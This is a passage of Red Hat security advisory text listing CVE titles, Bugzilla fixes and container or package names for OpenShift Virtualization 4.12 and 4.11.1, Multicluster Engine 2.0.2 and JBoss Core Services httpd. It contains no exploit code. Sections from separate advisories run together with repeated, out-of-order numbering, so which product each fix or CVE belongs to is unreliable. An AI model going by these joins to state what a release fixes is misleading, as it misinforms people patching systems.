branch names can lead to incorrect\naccess control (CVE-2022-23773)\n\n* golang: crypto/elliptic: IsOnCurve returns true for invalid field\nelements (CVE-2022-23806)\n\n* golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)\n\n* golang: syscall: faccessat checks wrong group (CVE-2022-29526)\n\n* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)\n\n* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)\n\n* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)\n\n* golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)\n\n* golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)\n\n* golang: net/http/httputil: NewSingleHostReverseProxy - omit\nX-Forwarded-For not working (CVE-2022-32148)\n\n* golang: crypto/tls: session tickets lack random ticket_age_add\n(CVE-2022-30629)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nRHEL-8-CNV-4.12\n\n=============\nbridge-marker-container-v4.12.0-24\ncluster-network-addons-operator-container-v4.12.0-24\ncnv-containernetworking-plugins-container-v4.12.0-24\ncnv-must-gather-container-v4.12.0-58\nhco-bundle-registry-container-v4.12.0-769\nhostpath-csi-driver-container-v4.12.0-30\nhostpath-provisioner-container-v4.12.0-30\nhostpath-provisioner-operator-container-v4.12.0-31\nhyperconverged-cluster-operator-container-v4.12.0-96\nhyperconverged-cluster-webhook-container-v4.12.0-96\nkubemacpool-container-v4.12.0-24\nkubevirt-console-plugin-container-v4.12.0-182\nkubevirt-ssp-operator-container-v4.12.0-64\nkubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55\nkubevirt-tekton-tasks-copy-template-container-v4.12.0-55\nkubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55\nkubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55\nkubevirt-tekton-tasks-operator-container-v4.12.0-40\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55\nkubevirt-template-validator-container-v4.12.0-32\nlibguestfs-tools-container-v4.12.0-255\novs-cni-marker-container-v4.12.0-24\novs-cni-plugin-container-v4.12.0-24\nvirt-api-container-v4.12.0-255\nvirt-artifacts-server-container-v4.12.0-255\nvirt-cdi-apiserver-container-v4.12.0-72\nvirt-cdi-cloner-container-v4.12.0-72\nvirt-cdi-controller-container-v4.12.0-72\nvirt-cdi-importer-container-v4.12.0-72\nvirt-cdi-operator-container-v4.12.0-72\nvirt-cdi-uploadproxy-container-v4.12.0-71\nvirt-cdi-uploadserver-container-v4.12.0-72\nvirt-controller-container-v4.12.0-255\nvirt-exportproxy-container-v4.12.0-255\nvirt-exportserver-container-v4.12.0-255\nvirt-handler-container-v4.12.0-255\nvirt-launcher-container-v4.12.0-255\nvirt-operator-container-v4.12.0-255\nvirtio-win-container-v4.12.0-10\nvm-network-latency-checkup-container-v4.12.0-89\n\n3. Solution:\n\nBefore applying this update, you must apply all previously released errata\nrelevant to your system. \n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1719190 - Unable to cancel live-migration if virt-launcher pod in pending state\n2023393 - [CNV] [UI]Additional information needed for cloning when default storageclass in not defined in target datavolume\n2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache\n2030806 - CVE-2021-44717 golang: syscall: don\u0027t close fd 0 on ForkExec error\n2040377 - Unable to delete failed VMIM after VM deleted\n2046298 - mdevs not configured with drivers installed, if mdev config added to HCO CR before drivers are installed\n2052556 - Metric \"kubevirt_num_virt_handlers_by_node_running_virt_launcher\" reporting incorrect value\n2053429 - CVE-2022-23806 golang: crypto/elliptic: IsOnCurve returns true for invalid field elements\n2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString\n2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control\n2060499 - [RFE] Cannot add additional service (or other objects) to VM template\n2069098 - Large scale |VMs migration is slow due to low migration parallelism\n2070366 - VM Snapshot Restore hangs indefinitely when backed by a snapshotclass\n2071491 - Storage Throughput metrics are incorrect in Overview\n2072797 - Metrics in Virtualization -\u003e Overview period is not clear or configurable\n2072821 - Top Consumers of Storage Traffic in Kubevirt Dashboard giving unexpected numbers\n2079916 - KubeVirt CR seems to be in DeploymentInProgress state and not recovering\n2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group\n2086285 - [dark mode] VirtualMachine - in the Utilization card the percentages and the graphs not visible enough in dark mode\n2086551 - Min CPU feature found in labels\n2087724 - Default template show no boot source even there are auto-upload boot sources\n2088129 - [SSP] webhook does not comply with restricted security context\n2088464 - [CDI] cdi-deployment does not comply with restricted security context\n2089391 - Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR\n2089744 - HCO should label its control plane namespace to admit pods at privileged security level\n2089751 - 4.12.0 containers\n2089804 - 4.12.0 rpms\n2091856 - ?Edit BootSource? action should have more explicit information when disabled\n2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add\n2092796 - [RFE] CPU|Memory display in the template card is not consistent with the display in the template drawer\n2093771 - The disk source should be PVC if the template has no auto-update boot source\n2093996 - kubectl get vmi API should always return primary interface if exist\n2094202 - Cloud-init username field should have hint\n2096285 - KubeVirt CR API documentation is missing docs for many fields\n2096780 - [RFE] Add ssh-key and sysprep to template scripts tab\n2097436 - Online disk expansion ignores filesystem overhead change\n2097586 - AccessMode should stay on ReadWriteOnce while editing a disk with storage class HPP\n2099556 - [RFE] Add option to enable RDP service for windows vm\n2099573 - [RFE] Improve template\u0027s message about not editable\n2099923 - [RFE] Merge \"SSH access\" and \"SSH command\" into one\n2100290 - Error is not dismissed on catalog review page\n2100436 - VM list filtering ignores VMs in error-states\n2100442 - [RFE] allow enabling and disabling SSH service while VM is shut down\n2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n2100629 - Update nested support KBASE article\n2100679 - The number of hardware devices is not correct in vm overview tab\n2100682 - All hardware devices get deleted while just delete one\n2100684 - Workload profile are not editable during creation and after creation\n2101144 - VM filter has two \"Other\" checkboxes which are triggered together\n2101164 - [dark mode] Number of alerts in Alerts card not visible enough in dark mode\n2101167 - Edit buttons clickable area is too large. \n2101333 - [e2e] elements on Template Scheduling tab are missing proper data-test-id\n2101335 - Clone action enabled in VM list kebab button for a VM in CrashLoopBackOff state\n2101390 - Easy to miss the \"tick\" when adding GPU device to vm via UI\n2101394 - [e2e] elements on VM Scripts tab are missing proper data-test-id\n2101423 - wrong user name on using ignition\n2101430 - Using CLOUD_USER_PASSWORD in Templates parameters breaks VM review page\n2101445 - \"Pending changes - Boot Order\"\n2101454 - Cannot add PVC boot source to template in \u0027Edit Boot Source Reference\u0027 view as a non-priv user\n2101499 - Cannot add NIC to VM template as non-priv user\n2101501 - NAME parameter in VM template has no effect. \n2101628 - non-priv user cannot load dataSource while edit template\u0027s rootdisk\n2101667 - VMI view is not aligned with vm and tempates\n2101681 - All templates are labeling \"source available\" in template list page\n2102074 - VM Creation time on VM Overview Details card lacks string\n2102125 - vm clone modal is displaying DV size instead of PVC size\n2102132 - align the utilization card of single VM overview with the design\n2102138 - Should the word \"new\" be removed from \"Create new VirtualMachine from catalog\"?\n2102256 - Add button moved to right\n2102448 - VM disk is deleted by uncheck \"Delete disks (1x)\" on delete modal\n2102475 - Template \u0027vm-template-example\u0027 should be filtered by \u0027Fedora\u0027 rather than \u0027Other\u0027\n2102561 - sysprep-info should link to downstream doc\n2102737 - Clone a VM should lead to vm overview tab\n2102740 - \"Save\" button on vm clone modal should be \"Clone\"\n2103806 - \"404: Not Found\" appears shortly by clicking the PVC link on vm disk tab\n2103807 - PVC is not named by VM name while creating vm quickly\n2103817 - Workload profile values in vm details should align with template\u0027s value\n2103844 - VM nic model is empty\n2104331 - VM list page scroll up automatically\n2104402 - VM create button is not enabled while adding multiple environment disks\n2104422 - Storage status report \"OpenShift Data Foundation is not available\" even the operator is installed\n2104424 - Enable descheduler or hide it on template\u0027s scheduling tab\n2104479 - [4.12] Cloned VM\u0027s snapshot restore fails if the source VM disk is deleted\n2104480 - Alerts in VM overview tab disappeared after a few seconds\n2104785 - \"Add disk\" and \"Disks\" are on the same line\n2104859 - [RFE] Add \"Copy SSH command\" to VM action list\n2105257 - Can\u0027t set log verbosity level for virt-operator pod\n2106175 - All pages are crashed after visit Virtualization -\u003e Overview\n2106963 - Cannot add configmap for windows VM\n2107279 - VM Template\u0027s bootable disk can be marked as bootable\n2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read\n2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob\n2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header\n2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse* functions\n2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working\n2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob\n2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode\n2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip\n2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal\n2108339 - datasource does not provide timestamp when updated\n2108638 - When chosing a vm or template while in all-namespace, and returning to list, namespace is changed\n2109818 - Upstream metrics documentation is not detailed enough\n2109975 - DataVolume fails to import \"cirros-container-disk-demo\" image\n2110256 - Storage -\u003e PVC -\u003e upload data, does not support source reference\n2110562 - CNV introduces a compliance check fail in \"ocp4-moderate\" profile - routes-protected-by-tls\n2111240 - GiB changes to B in Template\u0027s Edit boot source reference modal\n2111292 - kubevirt plugin console is crashed after creating a vm with 2 nics\n2111328 - kubevirt plugin console crashed after visit vmi page\n2111378 - VM SSH command generated by UI points at api VIP\n2111744 - Cloned template should not label `app.kubernetes.io/name: common-templates`\n2111794 - the virtlogd process is taking too much RAM! (17468Ki \u003e 17Mi)\n2112900 - button style are different\n2114516 - Nothing happens after clicking on Fedora cloud image list link\n2114636 - The style of displayed items are not unified on VM tabs\n2114683 - VM overview tab is crashed just after the vm is created\n2115257 - Need to Change system-product-name to \"OpenShift Virtualization\" in CNV-4.12\n2115258 - The storageclass of VM disk is different from quick created and customize created after changed the default storageclass\n2115280 - [e2e] kubevirt-e2e-aws see two duplicated navigation items\n2115769 - Machine type is updated to rhel8.6.0 in KV CR but not in Templates\n2116225 - The filter keyword of the related operator \u0027Openshift Data Foundation\u0027 is \u0027OCS\u0027 rather than \u0027ODF\u0027\n2116644 - Importer pod is failing to start with error \"MountVolume.SetUp failed for volume \"cdi-proxy-cert-vol\" : configmap \"custom-ca\" not found\"\n2117549 - Cannot edit cloud-init data after add ssh key\n2117803 - Cannot edit ssh even vm is stopped\n2117813 - Improve descriptive text of VM details while VM is off\n2117872 - CVE-2022-1798 kubeVirt: Arbitrary file read on the host from KubeVirt VMs\n2118257 - outdated doc link tolerations modal\n2118823 - Deprecated API 1.25 call: virt-cdi-controller/v0.0.0 (linux/amd64) kubernetes/$Format\n2119069 - Unable to start windows VMs on PSI setups\n2119128 - virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24\n2119309 - readinessProbe in VM stays on failed\n2119615 - Change the disk size causes the unit changed\n2120907 - Cannot filter disks by label\n2121320 - Negative values in migration metrics\n2122236 - Failing to delete HCO with SSP sticking around\n2122990 - VMExport should check APIGroup\n2124147 - \"ReadOnlyMany\" should not be added to supported values in memory dump\n2124307 - Ui crash/stuck on loading when trying to detach disk on a VM\n2124528 - On upgrade, when live-migration is failed due to an infra issue, virt-handler continuously and endlessly tries to migrate it\n2124555 - View documentation link on MigrationPolicies page des not work\n2124557 - MigrationPolicy description is not displayed on Details page\n2124558 - Non-privileged user can start MigrationPolicy creation\n2124565 - Deleted DataSource reappears in list\n2124572 - First annotation can not be added to DataSource\n2124582 - Filtering VMs by OS does not work\n2124594 - Docker URL validation is inconsistent over application\n2124597 - Wrong case in Create DataSource menu\n2126104 - virtctl image-upload hangs waiting for pod to be ready with missing access mode defined in the storage profile\n2126397 - many KubeVirtComponentExceedsRequestedMemory alerts in Firing state\n2127787 - Expose the PVC source of the dataSource on UI\n2127843 - UI crashed by selecting \"Live migration network\"\n2127931 - Change default time range on Virtualization -\u003e Overview -\u003e Monitoring dashboard to 30 minutes\n2127947 - cluster-network-addons-config tlsSecurityProfle takes a long time to update after setting APIServer\n2128002 - Error after VM template deletion\n2128107 - sriov-manage command fails to enable SRIOV Virtual functions on the Ampere GPU Cards\n2128872 - [4.11]Can\u0027t restore cloned VM\n2128948 - Cannot create DataSource from default YAML\n2128949 - Cannot create MigrationPolicy from example YAML\n2128997 - [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24\n2129013 - Mark Windows 11 as TechPreview\n2129234 - Service is not deleted along with the VM when the VM is created from a template with service\n2129301 - Cloud-init network data don\u0027t wipe out on uncheck checkbox \u0027Add network data\u0027\n2129870 - crypto-policy : Accepting TLS 1.3 connections by validating webhook\n2130509 - Auto image import in failed state with data sources pointing to external manually-created PVC/DV\n2130588 - crypto-policy : Common Ciphers support by apiserver and hco\n2130695 - crypto-policy : Logging Improvement and publish the source of ciphers\n2130909 - Non-privileged user can start DataSource creation\n2131157 - KV data transfer rate chart in VM Metrics tab is not displayed\n2131165 - [dark mode] Additional statuses accordion on Virtualization Overview page not visible enough\n2131674 - Bump virtlogd memory requirement to 20Mi\n2132031 - Ensure Windows 2022 Templates are marked as TechPreview like it is done now for Windows 11\n2132682 - Default YAML entity name convention. \n2132721 - Delete dialogs\n2132744 - Description text is missing in Live Migrations section\n2132746 - Background is broken in Virtualization Monitoring page\n2132783 - VM can not be created from Template with edited boot source\n2132793 - Edited Template BSR is not saved\n2132932 - Typo in PVC size units menu\n2133540 - [pod security violation audit] Audit violation in \"cni-plugins\" container should be fixed\n2133541 - [pod security violation audit] Audit violation in \"bridge-marker\" container should be fixed\n2133542 - [pod security violation audit] Audit violation in \"manager\" container should be fixed\n2133543 - [pod security violation audit] Audit violation in \"kube-rbac-proxy\" container should be fixed\n2133655 - [pod security violation audit] Audit violation in \"cdi-operator\" container should be fixed\n2133656 - [4.12][pod security violation audit] Audit violation in \"hostpath-provisioner-operator\" container should be fixed\n2133659 - [pod security violation audit] Audit violation in \"cdi-controller\" container should be fixed\n2133660 - [pod security violation audit] Audit violation in \"cdi-source-update-poller\" container should be fixed\n2134123 - KubeVirtComponentExceedsRequestedMemory Alert for virt-handler pod\n2134672 - [e2e] add data-test-id for catalog -\u003e storage section\n2134825 - Authorization for expand-spec endpoint missing\n2135805 - Windows 2022 template is missing vTPM and UEFI params in spec\n2136051 - Name jumping when trying to create a VM with source from catalog\n2136425 - Windows 11 is detected as Windows 10\n2136534 - Not possible to specify a TTL on VMExports\n2137123 - VMExport: export pod is not PSA complaint\n2137241 - Checkbox about delete vm disks is not loaded while deleting VM\n2137243 - registery input add docker prefix twice\n2137349 - \"Manage source\" action infinitely loading on DataImportCron details page\n2137591 - Inconsistent dialog headings/titles\n2137731 - Link of VM status in overview is not working\n2137733 - No link for VMs in error status in \"VirtualMachine statuses\" card\n2137736 - The column name \"MigrationPolicy name\" can just be \"Name\"\n2137896 - crypto-policy: HCO should pick TLSProfile from apiserver if not provided explicitly\n2138112 - Unsupported S3 endpoint option in Add disk modal\n2138119 - \"Customize VirtualMachine\" flow is not user-friendly because settings are split into 2 modals\n2138199 - Win11 and Win22 templates are not filtered properly by Template provider\n2138653 - Saving Template prameters reloads the page\n2138657 - Setting DATA_SOURCE_* Template parameters makes VM creation fail\n2138664 - VM that was created with SSH key fails to start\n2139257 - Cannot add disk via \"Using an existing PVC\"\n2139260 - Clone button is disabled while VM is running\n2139293 - Non-admin user cannot load VM list page\n2139296 - Non-admin cannot load MigrationPolicies page\n2139299 - No auto-generated VM name while creating VM by non-admin user\n2139306 - Non-admin cannot create VM via customize mode\n2139479 - virtualization overview crashes for non-priv user\n2139574 - VM name gets \"emptyname\" if click the create button quickly\n2139651 - non-priv user can click create when have no permissions\n2139687 - catalog shows template list for non-priv users\n2139738 - [4.12]Can\u0027t restore cloned VM\n2139820 - non-priv user cant reach vm details\n2140117 - Provide upgrade path from 4.11.1-\u003e4.12.0\n2140521 - Click the breadcrumb list about \"VirtualMachines\" goes to undefined project\n2140534 - [View only] it should give a permission error when user clicking the VNC play/connect button as a view only user\n2140627 - Not able to select storageClass if there is no default storageclass defined\n2140730 - Links on Virtualization Overview page lead to wrong namespace for non-priv user\n2140808 - Hyperv feature set to \"enabled: false\" prevents scheduling\n2140977 - Alerts number is not correct on Virtualization overview\n2140982 - The base template of cloned template is \"Not available\"\n2140998 - Incorrect information shows in overview page per namespace\n2141089 - Unable to upload boot images. \n2141302 - Unhealthy states alerts and state metrics are missing\n2141399 - Unable to set TLS Security profile for CDI using HCO jsonpatch annotations\n2141494 - \"Start in pause mode\" option is not available while creating the VM\n2141654 - warning log appearing on VMs: found no SR-IOV networks\n2141711 - Node column selector is redundant for non-priv user\n2142468 - VM action \"Stop\" should not be disabled when VM in pause state\n2142470 - Delete a VM or template from all projects leads to 404 error\n2142511 - Enhance alerts card in overview\n2142647 - Error after MigrationPolicy deletion\n2142891 - VM latency checkup: Failed to create the checkup\u0027s Job\n2142929 - Permission denied when try get instancestypes\n2143268 - Topolvm storageProfile missing accessModes and volumeMode\n2143498 - Could not load template while creating VM from catalog\n2143964 - Could not load template while creating VM from catalog\n2144580 - \"?\" icon is too big in VM Template Disk tab\n2144828 - \"?\" icon is too big in VM Template Disk tab\n2144839 - Alerts number is not correct on Virtualization overview\n2153849 - After upgrade to 4.11.1-\u003e4.12.0 hco.spec.workloadUpdateStrategy value is getting overwritten\n2155757 - Incorrect upstream-version label \"v1.6.0-unstable-410-g09ea881c\" is tagged to 4.12 hyperconverged-cluster-operator-container and hyperconverged-cluster-webhook-container\n\n5. Description:\n\nMulticluster Engine for Kubernetes 2.0.2 images\n\nMulticluster engine for Kubernetes provides the foundational components\nthat are necessary for the centralized management of multiple\nKubernetes-based clusters across data centers, public clouds, and private\nclouds. \n\nYou can use the engine to create new Red Hat OpenShift Container Platform\nclusters or to bring existing Kubernetes-based clusters under management by\nimporting them. After the clusters are managed, you can use the APIs that\nare provided by the engine to distribute configuration based on placement\npolicy. \n\nSecurity updates:\n\n* moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)\n* vm2: Sandbox Escape in vm2 (CVE-2022-36067)\n\nBug fix:\n\n* MCE 2.0.2 images (BZ# 2104569)\n\n3. Solution:\n\nFor multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html-single/multicluster_engine/index#installing-while-connected-online\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2104569 - MCE 2.0.2 Images\n2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS\n2124794 - CVE-2022-36067 vm2: Sandbox Escape in vm2\n\n5. \n\nBug Fix(es):\n\n* Cloning a Block DV to VM with Filesystem with not big enough size comes\nto endless loop - using pvc api (BZ#2033191)\n\n* Restart of VM Pod causes SSH keys to be regenerated within VM\n(BZ#2087177)\n\n* Import gzipped raw file causes image to be downloaded and uncompressed to\nTMPDIR (BZ#2089391)\n\n* [4.11] VM Snapshot Restore hangs indefinitely when backed by a\nsnapshotclass (BZ#2098225)\n\n* Fedora version in DataImportCrons is not \u0027latest\u0027 (BZ#2102694)\n\n* [4.11] Cloned VM\u0027s snapshot restore fails if the source VM disk is\ndeleted (BZ#2109407)\n\n* CNV introduces a compliance check fail in \"ocp4-moderate\" profile -\nroutes-protected-by-tls (BZ#2110562)\n\n* Nightly build: v4.11.0-578: index format was changed in 4.11 to\nfile-based instead of sqlite-based (BZ#2112643)\n\n* Unable to start windows VMs on PSI setups (BZ#2115371)\n\n* [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity\nrestricted:v1.24 (BZ#2128997)\n\n* Mark Windows 11 as TechPreview (BZ#2129013)\n\n* 4.11.1 rpms (BZ#2139453)\n\nThis advisory contains the following OpenShift Virtualization 4.11.1\nimages. \n\nRHEL-8-CNV-4.11\n\nvirt-cdi-operator-container-v4.11.1-5\nvirt-cdi-uploadserver-container-v4.11.1-5\nvirt-cdi-apiserver-container-v4.11.1-5\nvirt-cdi-importer-container-v4.11.1-5\nvirt-cdi-controller-container-v4.11.1-5\nvirt-cdi-cloner-container-v4.11.1-5\nvirt-cdi-uploadproxy-container-v4.11.1-5\ncheckup-framework-container-v4.11.1-3\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.11.1-7\nkubevirt-tekton-tasks-create-datavolume-container-v4.11.1-7\nkubevirt-template-validator-container-v4.11.1-4\nvirt-handler-container-v4.11.1-5\nhostpath-provisioner-operator-container-v4.11.1-4\nvirt-api-container-v4.11.1-5\nvm-network-latency-checkup-container-v4.11.1-3\ncluster-network-addons-operator-container-v4.11.1-5\nvirtio-win-container-v4.11.1-4\nvirt-launcher-container-v4.11.1-5\novs-cni-marker-container-v4.11.1-5\nhyperconverged-cluster-webhook-container-v4.11.1-7\nvirt-controller-container-v4.11.1-5\nvirt-artifacts-server-container-v4.11.1-5\nkubevirt-tekton-tasks-modify-vm-template-container-v4.11.1-7\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.11.1-7\nlibguestfs-tools-container-v4.11.1-5\nhostpath-provisioner-container-v4.11.1-4\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.11.1-7\nkubevirt-tekton-tasks-copy-template-container-v4.11.1-7\ncnv-containernetworking-plugins-container-v4.11.1-5\nbridge-marker-container-v4.11.1-5\nvirt-operator-container-v4.11.1-5\nhostpath-csi-driver-container-v4.11.1-4\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.11.1-7\nkubemacpool-container-v4.11.1-5\nhyperconverged-cluster-operator-container-v4.11.1-7\nkubevirt-ssp-operator-container-v4.11.1-4\novs-cni-plugin-container-v4.11.1-5\nkubevirt-tekton-tasks-cleanup-vm-container-v4.11.1-7\nkubevirt-tekton-tasks-operator-container-v4.11.1-2\ncnv-must-gather-container-v4.11.1-8\nkubevirt-console-plugin-container-v4.11.1-9\nhco-bundle-registry-container-v4.11.1-49\n\n3. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.51 SP1 security update\nAdvisory ID: RHSA-2022:8840-01\nProduct: Red Hat JBoss Core Services\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:8840\nIssue date: 2022-12-08\nCVE Names: CVE-2022-1292 CVE-2022-2068 CVE-2022-22721\n CVE-2022-23943 CVE-2022-26377 CVE-2022-28330\n CVE-2022-28614 CVE-2022-28615 CVE-2022-30522\n CVE-2022-31813 CVE-2022-32206 CVE-2022-32207\n CVE-2022-32208 CVE-2022-32221 CVE-2022-35252\n CVE-2022-42915 CVE-2022-42916\n====================================================================\n1. Summary:\n\nAn update is now available for Red Hat JBoss Core Services. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat JBoss Core Services on RHEL 7 Server - noarch, x86_64\nRed Hat JBoss Core Services on RHEL 8 - noarch, x86_64\n\n3. Description:\n\nRed Hat JBoss Core Services is a set of supplementary software for Red Hat\nJBoss middleware products. This software, such as Apache HTTP Server, is\ncommon to multiple JBoss middleware products, and is packaged under Red Hat\nJBoss Core Services to allow for faster distribution of updates, and for a\nmore consistent update experience. \n\nThis release of Red Hat JBoss Core Services Apache HTTP Server 2.4.51\nService Pack 1 serves as a replacement for Red Hat JBoss Core Services\nApache HTTP Server 2.4.51, and includes bug fixes and enhancements, which\nare documented in the Release Notes document linked to in the References. \n\nSecurity Fix(es):\n\n* curl: HSTS bypass via IDN (CVE-2022-42916)\n\n* curl: HTTP proxy double-free (CVE-2022-42915)\n\n* curl: POST following PUT confusion (CVE-2022-32221)\n\n* httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism\n(CVE-2022-31813)\n\n* httpd: mod_sed: DoS vulnerability (CVE-2022-30522)\n\n* httpd: out-of-bounds read in ap_strcmp_match() (CVE-2022-28615)\n\n* httpd: out-of-bounds read via ap_rwrite() (CVE-2022-28614)\n\n* httpd: mod_proxy_ajp: Possible request smuggling (CVE-2022-26377)\n\n* curl: control code in cookie denial of service (CVE-2022-35252)\n\n* jbcs-httpd24-httpd: httpd: mod_isapi: out-of-bounds read (CVE-2022-28330)\n\n* curl: Unpreserved file permissions (CVE-2022-32207)\n\n* curl: various flaws (CVE-2022-32206 CVE-2022-32208)\n\n* openssl: the c_rehash script allows command injection (CVE-2022-2068)\n\n* openssl: c_rehash script allows command injection (CVE-2022-1292)\n\n* jbcs-httpd24-httpd: httpd: core: Possible buffer overflow with very large\nor unlimited LimitXMLRequestBody (CVE-2022-22721)\n\n* jbcs-httpd24-httpd: httpd: mod_sed: Read/write beyond bounds\n(CVE-2022-23943)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nApplications using the APR libraries, such as httpd, must be restarted for\nthis update to take effect. After installing the updated packages, the\nhttpd daemon will be restarted automatically. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2064319 - CVE-2022-23943 httpd: mod_sed: Read/write beyond bounds\n2064320 - CVE-2022-22721 httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody\n2081494 - CVE-2022-1292 openssl: c_rehash script allows command injection\n2094997 - CVE-2022-26377 httpd: mod_proxy_ajp: Possible request smuggling\n2095000 - CVE-2022-28330 httpd: mod_isapi: out-of-bounds read\n2095002 - CVE-2022-28614 httpd: Out-of-bounds read via ap_rwrite()\n2095006 - CVE-2022-28615 httpd: Out-of-bounds read in ap_strcmp_match()\n2095015 - CVE-2022-30522 httpd: mod_sed: DoS vulnerability\n2095020 - CVE-2022-31813 httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism\n2097310 - CVE-2022-2068 openssl: the c_rehash script allows command injection\n2099300 - CVE-2022-32206 curl: HTTP compression denial of service\n2099305 - CVE-2022-32207 curl: Unpreserved file permissions\n2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification\n2120718 - CVE-2022-35252 curl: control code in cookie denial of service\n2135411 - CVE-2022-32221 curl: POST following PUT confusion\n2135413 - CVE-2022-42915 curl: HTTP proxy double-free\n2135416 - CVE-2022-42916 curl: HSTS bypass via IDN\n\n6. Package List:\n\nRed Hat JBoss Core Services on RHEL 7 Server:\n\nSource:\njbcs-httpd24-apr-util-1.6.1-99.el7jbcs.src.rpm\njbcs-httpd24-curl-7.86.0-2.el7jbcs.src.rpm\njbcs-httpd24-httpd-2.4.51-37.el7jbcs.src.rpm\njbcs-httpd24-mod_http2-1.15.19-20.el7jbcs.src.rpm\njbcs-httpd24-mod_jk-1.2.48-44.redhat_1.el7jbcs.src.rpm\njbcs-httpd24-mod_md-2.4.0-18.el7jbcs.src.rpm\njbcs-httpd24-mod_proxy_cluster-1.3.17-13.el7jbcs.src.rpm\njbcs-httpd24-mod_security-2.9.3-22.el7jbcs.src.rpm\njbcs-httpd24-nghttp2-1.43.0-11.el7jbcs.src.rpm\njbcs-httpd24-openssl-1.1.1k-13.el7jbcs.src.rpm\njbcs-httpd24-openssl-chil-1.0.0-17.el7jbcs.src.rpm\njbcs-httpd24-openssl-pkcs11-0.4.10-32.el7jbcs.src.rpm\n\nnoarch:\njbcs-httpd24-httpd-manual-2.4.51-37.el7jbcs.noarch.rpm\n\nx86_64:\njbcs-httpd24-apr-util-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-debuginfo-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-devel-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-ldap-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-mysql-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-nss-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-odbc-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-openssl-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-pgsql-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-sqlite-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-curl-7.86.0-2.el7jbcs.x86_64.rpm\njbcs-httpd24-curl-debuginfo-7.86.0-2.el7jbcs.x86_64.rpm\njbcs-httpd24-httpd-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-httpd-debuginfo-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-httpd-devel-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-httpd-selinux-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd